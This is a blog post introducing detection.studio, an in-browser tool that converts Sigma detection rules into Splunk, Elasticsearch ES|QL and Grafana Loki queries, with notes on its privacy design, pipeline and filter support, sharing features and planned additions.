detection.studio

A new tool to help detection engineers get the most out of Sigma.

detection.studio
Photo by Dim Gunger / Unsplash

I am finally happy to bring to life a tool I've wanted to make for a while.

This tool converts from the generic detection format Sigma to a SIEM specific language, like Splunk's SPL, Elasticsearch's ES|QL or Grafana's Loki. If you're interested more about what the Sigma project is about, I recommend checking out https://sigmahq.io/

detection.studio is very similar to sigconverter.io, but with a few additional features that I think people will hopefully appreciate.

Detection Studio – detection.studio
Design, build and share detection rules for your security tools.
Detection Studio

(you can view the above example at here)

Local (In-Browser) Conversion

One of the biggest items that I wanted to consider is privacy. Detection rules can be incredibly sensitive to organisations, and incredibly tailored to the environment and applications – often providing a large amount of intelligence to threat actors if someone were to get a hold of them.

I initially explored this in a tweet I made back in Aug 2023.

I knew back then that running the entire pySigma stack locally in-browser was technically possible – however the performance wasn't comparable to running a Python server natively to perform the conversion instead.

The solution to this ended up being a mixture of removing the reliance on a CLI via sigma-cli, and instead using the pySigma library directly. This, combined with caching the Pyodide Python modules, resulted in a performance that I considered to be indistinguishable from the server-based solution – albeit at the cost of an initial 2-5MB download of the Python interpreter, and additional dependencies.

Better Support for Pipelines & Filters

A lot of the reason I ended up wanting to uplift the Sigma documentation, was that I saw a great technology project – converting from generic detections to SIEM specific ones – with an adoption and learning curve problem, especially when it came to some of the more complex features of Sigma – such as Pipelines and Filters.

Similar to that β€” this tool was made to help SOC teams get the most out of their detection rules

I ended up adding a pseudo-file manager – as basic as it is – to help with adding filters and pipelines to alerts. It's a concept I think a lot of people have become more familiar in the past 10-15 years, and translates really well to those wanting to move from this tool back onto the CLI with minimal mental overhead.

For the main targets (Splunk, ES|QL and Loki), I ended up writing in some unique handling for how pipelines get added when these are selected. Especially for logsource prefixing in Splunk index=my_index source=my_souce and custom-logsource setting in Loki, {index='~logs-test-.*',source='logs-test-.*} | json | ..., it should give those who are new to Sigma the lightbulb moment I needed to understand the flexibility of the new Pipelines system. A very similar customisation was also enabled for Filters, which I talk about at length here.

Persistent Workspaces, and Share & Export to Zip

A simple persistent Pinia plugin helped the work being done in sessions be saved to the browser's local cache, meaning people shouldn't have to lost all their work on a refresh.

The tool also features a basic share feature, and a download to zip function as well – which will hopefully help people get their first start at a generic "Detection-as-Code" repo.

Where to from here?

A non-exhaustive list of features I want to add to detection.studio – in some mangled order of priority is:

  • A "Regex101-style" detection matching system – meaning "uploading" a data file of logs to the browser and have the UI show where matches occur – almost like a mini-SIEM. I personally think would help tremendously with logic building for more complex rules.
    • (I don't think I'll make the data file persistent, as sharing becomes a lot more difficult to fit in the 2MB limit of URL hashes).
  • A more fluent "drop-down" UI for applying modifiers, field-mappings, filters etc. I would also love a UI for selecting the "data" section for generating a Sigma filter based on clicking on a field within the upload data
  • A Sigma rule browser (currently Github doesn't allow you to browse rules without an API key, which is an interesting challenge to work around in an effectively "client-only" restriction).
  • The general settings for more quality of life improvements as well – setting the default SIEM for the browser, etc.
  • Compressing the sharing link more – given that Sigma usually is defined keywords, and by association, a very well defined dictionary, compressing the share link would be good to see. I observed first hand why I would want to do this when using this tool during an exercise, where Slack would not let me send the link due to the size of the object itself.

A long way to go before I'd consider it a finished OSS tool, but excited nonetheless to share with the world.

I do have to shout-out a huge thank you to the team who developed SigConverter for the UI that has still brought in a lot of new people into the Sigma ecosystem, and helped me at my work explain the concepts of Sigma conversion to my team. πŸ™‡